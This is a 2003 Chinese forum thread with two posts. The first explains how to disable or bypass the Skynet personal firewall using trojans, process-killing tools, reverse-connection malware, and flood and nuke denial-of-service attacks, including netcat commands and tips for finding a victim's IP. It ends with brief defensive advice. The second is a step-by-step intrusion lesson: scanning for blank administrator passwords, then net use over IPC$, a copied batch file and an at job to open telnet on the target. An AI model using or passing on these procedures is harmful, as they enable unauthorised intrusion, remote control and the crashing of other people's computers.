光电工程师社区
标题:
攻破天网的几种方法!!
[打印本页]
作者:
suncon
时间:
2003-11-24 09:48
标题:
攻破天网的几种方法!!
攻破天网的几种方法!!
天网是大家常用的防火墙软件,有许多人撰文提议安装天网,一时间天网防火墙成了菜鸟、高手必备工具。这样做当然好,至少说明了大家的网络安全意识提高了许多。但万事都有个“度”,超过这个“度”就不好了。现在有许多人对天网的迷信达到了痴迷的程度,认为安装了天网就高枕无忧了,他们在上网时只是打开天网,至于天网运行得怎么样就不管了。其实,就在此时你危险了!
一、堡垒往往是从内部被攻破的
堡垒往往是从内部被攻破的,这话一点都不假。远在古希腊时代,坚固的城墙没有保护住特洛伊人的家园,被一个小小的木马所攻破,在今天这个道理依然应验。
1.用黑毒克星或NoSkyNet
目前的天网防火墙可谓树大招风,天网也逐渐成为了黑客们攻击的主要对象!针对它的黑客工具也层出不穷,黑毒克星和NoSkyNet就是其中之一。这两个软件共同的特点之一就是小巧隐蔽,另一个特点就是它们将天网破坏殆尽后,居然还能让天网防火墙在任务栏正常显示图标!具有极大的危害性和欺骗性。
虽然黑毒克星和NoSkyNet必须被运行它们才有机会破坏天网防火墙,但百密难免一疏,对于仅几k大小的黑毒克星、NoSkyNet,真的很难保证不会中招(黑客们当然不会那么傻,他们会把黑毒克星、NoSkyNet改名,如改为系统优化或微软补丁之类的名称,这样如果你运行了这些“优化补丁”,你的天网就完了!),对付它们只能自己小心了。
2.用黑洞2001
黑洞2001是个木马程序,具有出色的多进程监控功能。随着大家安全意识的不断提高,大多数人都安装了网络防火墙,木马们的生存空间越来越小,为生存计,木马开发者想出了一个办法,他让木马服务端定时刷新进程,如果发现其中的进程名称与其事先定义好的相符合,就将这个进程关闭,如果这个被关闭的进程恰巧就是防火墙,那你的网络大门就完全敞开了,监控端就可为所欲为了。
事实上这个功能就是针对防火墙出现的,一切堡垒都是从内部被攻破的在此得到了充分的体现。其实在黑洞2000中就有了这样的功能,只不过黑洞2000只能关闭天网防火墙,对其它防火墙没有任何作用。黑洞2001则可以定义长达99个英文字符号,完全可以将您可能会用到的防火墙都定义到其中,从而可将这些防火墙全部关闭!对于黑洞2001的多进程监控功能,让我们作一个小测试。首先,在客户端作配置。点击“修改远程服务器端设置”按钮,再点击其中的“智能监控”标签,出现如图所示画面(如图1)。
在“进程监控”栏中添入“墙,毒,LOCK”,选中“使用进程监控”,然后点击“修改配置”保存设置。在服务端运行天网防火墙、金山毒霸、Lockdown、PC-Cillin等软件,一分钟后这些软件被自动关闭!由上可以看出如果你中了黑洞2001,那么你的防火墙就全成了聋子的耳朵——摆设!
3.利用“反弹端口”型木马
国内第一个“反弹端口”型木马“网络神偷”就可以突破天网防线,使天网失效。“正常”木马是由客户端主动连接服务端的,通俗的说就是下木马方要主动连接中木马的机子,这样很容易让防火墙发现;而反弹端口型木马与一般的木马相反,反弹端口型木马的服务端(被控制端)使用主动端口,客户端(控制端)使用被动端口,当要建立连接时,由客户端通过 FTP 主页空间告诉服务端:“现在开始连接我吧!”,并进入监听状态,服务端收到通知后,就会开始连接客户端。为了隐蔽起见,客户端的监听端口一般开在80,这样,即使用户使用端口扫描软件检查自己的端口,发现的也是类似“TCP 服务端的IP地址:1026 客户端的IP地址:80 ESTABLISHED”的情况,稍微疏忽一点你就会以为是自己在浏览网页。(防火墙也会这么认为的,我想大概没有哪个防火墙会不给用户向外连接80端口吧)。因此这类木马可以突破几乎所有的防火墙(包括代理防火墙及过滤型防火墙)!
在我用“网络神偷”试验过程中,在天网设置成默认规则的情况下,服务端连接成功并进行文件访问,服务端主机上的天网毫无反应!天网就这样被突破了!“反弹端口”型木马由于是由服务端主动连接客户端的,所以天网规则里的“禁止所有人连接”对它是一点用也没有,只要“允许FTP的数据通道”开启和“TCP数据包监视”关闭(默认设置正是这样),天网就不会有任何反应的,这可比黑洞等木马一上来就关闭天网要危险多了!
注:由于网络神偷使用了VxD技术,因此该软件无法在Windows2000/NT下使用,非Windows2000/NT下的朋友就要小心它了!
雄鹰注:目前有几个QQ炸弹也可以绕过防火墙,好用,屡试不爽!
二、强攻也可突破天网的保护
其实,只要能够加以注意,或不是那么“菜”的话,那么上面所说的从内部攻破的方法就会失效(可惜许多人就是不够小心),此时就只有强攻这一条路了。虽然天网对各类IP炸弹的攻击保护等不错,但仍有空子可钻,有四种方法攻破它,请看:
1.使装天网的系统死机的简单方法
推荐工具:PortScan和IGMP Nuke
(1)得到对方的IP
要查对方IP最简单的方法是打开网络防火墙,如天网,然后点击“安全规则设置”,在弹出的对话框中把“UDP数据包监视”前面的多选框内打上“√”,然后保存设置。现在,在QQ中给那个人发个消息,再来点击天网中的“日志”按钮,从中你就会发现对方的IP。有了IP,他想跑可就难了,哈哈。
(2)开始攻击
打开两个或两个以上PortScan,在“Scan:”栏中填入对方的IP,在“Send Port:”栏中填入1,在“Stop Port:”栏中填入65536,这样就配置完毕,可以攻击了!现在按“START”按钮,然后你就可以忙你的别的事吧!扫描的事教给PortScan就可以了。
(3)攻击原理
天网防火墙有个习惯,它对任何外来的不明数据包都会拦截,当一个时间段内有大量的 “各种不同类型的”数据包涌过来,天网会对之进行一一拦截,还要分析和解析这是什么数据包,一秒钟要解析几十次以上,由于数据包太多,会造成系统的资源逐渐耗掉,对方机子上的应用程序会越来越慢,最终……呵呵!由于PortScan占用系统资源不多,因此本机的速度不会变慢多少。
(4)攻击深入
如果该用户发现是由于天网的过多拦截才造成死机,那他就会关闭天网。此时IGMP Nuke就会发挥作用了:你可以每隔一段时间就对着目标IP运行一下IGMP Nuke,用默认设置就可以。结果,没有了天网的对方当然是蓝屏啦!真是有天网也烦,没天网也烦呀!
(5)攻击时自身防范
本方法有一个缺点,就是对方能知道你的IP(天网中会记录下来的),因此你最好能使用代理服务器免得暴露自己。
2.利用天网小BUG
天网有个小BUG(也许不能算作BUG),它只能记录6万多条攻击记录。那如果有多出来的的记录会怎么样呢?这正是攻击者经常利用的一点。攻击者使用ICMP或IGMP包进行攻击,当攻击6万多次以后,天网就会不断弹出错误对话框,直到耗尽内存而当机!尽管手段不够漂亮,但的确使装有天网的主机死机了!简单实用就是这个方法的最大特点!
3.不断发送二进制的0字节流到
不停地发送二进制的0字节流到装有天网主机的特定端口(用TCP或UDP都可以),使装天网的主机当机。简单的测试方法如下:在Linux中通过netcat输入/dev/zero内容,命令如下:
TCP的测试命令为: nc 目标主机 端口 /dev/zero
举例:nc 127.0.0.1 7 /dev/zero 其中“127.0.0.1”为装有天网主机的IP,“7”为目标主机端口。
UDP的测试命令为:nc -u 目标主机 端口 /dev/zero
举例:nc -u 127.0.0.1 53 /dev/zero 其中“127.0.0.1”为装有天网主机的IP,“53”为目标主机端口。
TCP ports:7 9 21 23 7778等都是TCP端口。
UDP ports:53 67 68 135 137 500 1812 1813 2535 3456等都是UDP端口。
在本文即将撰稿完毕之际,天网又推出了新的测试版本,新增了一个非常好的功能:天网防火墙增加了对应用程序数据包进行底层分析拦截功能,它可以控制应用程序发送和接收数据包的类型、通讯端口,并且决定拦截还是通过,这是目前其以前版本所不具有的功能。如果能很好的利用该功能,可以有效防止利用“反弹端口”型木马如“网络神偷”等程序悄悄连接客户端,但遗憾的是许多人嫌该功能太烦人(不管哪个程序启动运行,天网都会向您询问是否运行),因此将某些程序设置为“始终允许”,此时就给木马程序提供了机会——木马也可能被您设置为“始终允许”!就这样天网精心构筑的防线被您轻易的打开了!从这个角度上来说,世上只有愚蠢的人,而没有愚蠢的防火墙!
解决办法
1.不要到小站点下载软件,更不要运行“好心”的大虾提供的补丁之类的软件,当心被别有用心的人利用!如此一来,可以防止木马及黑毒克星、NoSkyNet之类的软件被运行。
2.保持警惕性,对不熟悉的人发来的E-Mail不要轻易打开,带有附件就更要小心了。另外算就是熟人发来的E-Mail,对其中的附件也要小心,您的朋友也许会无意中害了您(他的电脑被感染了木马,但他有可能自己并不知道)。
3.安装杀毒反黑软件,下载软件运行前用杀毒反黑软件检查,如金山毒霸就可以识别出黑毒克星、NoSkyNet和上面说的黑洞2001,而反黑软件如“木马克星”可以查出网络神偷。
4.注意注册表HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Curren Version和HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion下,所有以“Run”开头的键值名,其下有没有可疑的文件名。如果有,就需要删除相应的键值,再删除相应的应用程序。
5.启动组和Win.ini以及System.ini也是木马们喜欢的隐蔽场所,要注意检查这些地方。
6.最好通过代理服务器上网,只有这样才能真正隐藏自己的IP,那些通过得知你的IP来攻击你的人就会失去目标了。
7.千万不要嫌天网“烦”,天网是有些像大话西游中的唐僧,但你既然选择了它,就要忍受它的“罗嗦”,其实所谓的“罗嗦”正是天网在不厌其烦的提醒你、保护你,所以要看仔细了,到底是什么程序要连线运行。
8.注意自己在网上的言语,尽量不得罪人,真正的黑客是不会无缘无故的攻击你的。只有那些“灰”客才乱攻击,对付他们请用方法6。
本文的目的是希望大家不要太迷信防火墙,注意提高自身素质,加强自己的网络安全意识。如果能达到这个目的,吾愿足矣!
作者:
suncon
时间:
2003-11-24 09:52
标题:
攻破天网的几种方法!!
想做黑客???
前言:你是不是很想做黑客呢?是不是经常周游于各个黑客站点呢?学黑客是真的很难的!它需要你有足够的耐性!毅力!只有持之以恒才能有所成就!好了~灌了那么多的水,下面就开始吧!注意:本文只适合新手!已入门的请去看别的技术文章吧!下面就用我仅仅知道的知识让你们取得第一次的成功吧!\\操作系统拜托你装个2000的好不好?不要再问为什么了~\\(本文注释用\\注释内容\\标记!
第一节课:命令的使用
你必须懂得一些命令才能更好地运用!总不能一边入侵一边去看例文吧!(什么?你喜欢?我晕了~)好了~下面就看看一些常用的命令吧!也就是入侵必须懂得的基本命令!如果你连这都栏得看的话你就可以放学了~放你的长假去吧!
1.net
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
上面就是net命令.你可以在cmd下键入net/?获得.我们看看一些常用的.
net user \\列举所有用户\\ 例子:c:\net user
net localgroup \\把用户分组\\ 例子:c:\net localgroup administrators guest /add \\把guest用户加到管理组.需要有足够的权限才能进行操作!\\
net share \\显示共享资源\\ 例子:c:\net share
net start \\启动服务,或显示已启动服务的列表\\ 例子:\net start 例子:\net start telnet \\启动telnet\\
net stop \\停止Windows2000网络服务\\ 例子c:\net stop telnet \\停止telnet服务\\
net time \\显示时间\\ 例子:c:\net time 127.0.0.1 \\显示127.0.0.1的时间\\
net use \\显示关于计算机连接的信息\\ 例子:c:\net use
net view \\显示域列表、计算机列表或者由指定计算机共享的资源\\ 例子:c:\net view
net的基本命令就到此结束吧!但并不是说其它的命令不用去学!只是我的基本教学(入侵)课程需要用的命令是这些而已~自己去windows帮助那里看看吧!DOS下的基本命令是很重要的!如:copy等.还有ftp等等重要的命令因为种种原因请各位自行去看.(基本课程不能太复杂的,OK?!!!)好了~下课~
第二节课:端口和木马
A.第二节课了~这节课我们首先来学习一下端口吧!什么是端口?就是计算机和外界连接的通道!例如我们看网页用的实际上是80端口.
1)、telnet登录的端口 (23/tcp)
这个信息表明远程登录服务正在运行,在这里你可以远程登录到该主机.
2)、WWW(80/TCP)端口
它表明WWW服务在该端口运行
别告诉我你不知道WWW服务是什么哦,也就是说,如果有网站的服务器都有80端口。
3)、FTP(21/tcp)
ftp服务和TELNET服务一样,你还可以从FTP服务器上获得或上传资料木马等,有的还是匿名登陆的,不过这样的好事好像不多。
4)、finger (79/tcp) 端口
finger服务对入侵者来说是一个非常有用的信息,从它可以获得用户信息,查看机器的运行情况等。
5)、远程控制(3389)
这个端口用于远程登陆.
还有一些常见的端口例如110,135,139,25等等等.....我们这次基础教程需要用到的是23端口.其它的因为觉得重要所以也列举了出来.剩下的请自己去补补.(不是我不负责任.是课程的问题!请谅解!)PS:并不是所有的端口都是有用的.
B.木马
讲个故事给大家听吧!----传说希腊人围攻特洛伊城,久久不能得手。后来想出了一个木马计,让士兵藏匿于巨大的木马中。大部队假装撤退而将木马摈弃于特洛伊城下,让敌人将其作为战利品拖入城内。木马内的士兵则乘夜晚敌人庆祝胜利、放松警惕的时候从木马中爬出来,与城外的部队里应外合而攻下了特洛伊城。
木马的危害性是很大的!例如冰河等木马甚至可以远程控制你的电脑!同时木马也会打开一些端口.你也可以借查看端口来看看有没木马在你的电脑上运行.不过有的木马是利用已有的端口的.这个就比较麻烦了.需要用杀毒软件帮忙了~ \\我们的课程并不需要使用到木马.只是本人认为各位值得一学\\
第三节课:ipc入侵.
好了~估计你们看了那么多基础的东西已经很不耐烦了~这节课就来实行你的第一次入侵吧!咳咳~放下你的AK-47,我们不需要那个家伙....
A.什么是ipc?
IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用.利用IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得到目标主机上的用户列表。用“流光”的IPC$探测功能,就可以得到用户列表了,并可以配合字典,进行密码尝试。
B.OK!运用你在上两节课学到的知识跟我冲吧!掌握好你的命令使用了吗?
需要用的的扫描软件:xscan 操作系统:win2000(不要告诉我你那还是98或者me,我马上K了你!)
首先我们使用扫描器扫描一个IP段.打开xscan,选择设置,再选扫描模块,然后只选nt弱口令的那项.确定后选设置,扫描参数然后填入IP段.就127.0.0.1-127.0.0.255吧!(注意:IP段纯属虚构.)
假设我们已经扫到一个了.127.0.0.2 用户名:Administrator 密码:空(唉~真搞不清现在的人为什么这么没安全意识...)
打开cmd,输入:net use \\127.0.0.1\ipc$ /user:Administrator 命令成功完成.OK!下一步~
at \\127.0.0.1 \\这步纯属个人习惯.因为我想知道他开了AT没有.没开就放弃吧\\
接下来我们需要编辑一个批处理文件.打开记事本,输入如下内容
net start telnet 然后保存为a.bat \\注意扩展名!是bat!\\
编辑好后就继续吧! copy a.bat \\127.0.0.1\admin$ \\admin$就是放在目标winnt的根目录下\\
net time \\127.0.0.1 \\看看目标的时间吧!有用的~\\
假设是晚上9点.接着下一步吧!
at \\127.0.0.1 20:01 a.bat \\用AT命令让目标运行a.bat.注意时间要24小时制的!\\
net time \\127.0.0.1 \\看看到时间没?\\
假设到了,我们就实行下一步吧!
telnet 127.0.0.1 \\登陆到对方的机子上.刚才的那个批处理就是用来打开它的23端口的~\\
接着输入用户名和密码 \\就是用户Administrator啊!密码是空的.回车就行了~\\
OK!一切成功!现在你可以做你想做的事了~例如添加用户等等(就是命令的使用啊!所以说命令重要!)
欢迎光临 光电工程师社区 (http://bbs.oecr.com/)
Powered by Discuz! X3.2
net start telnet 然后保存为a.bat \\注意扩展名!是bat!\\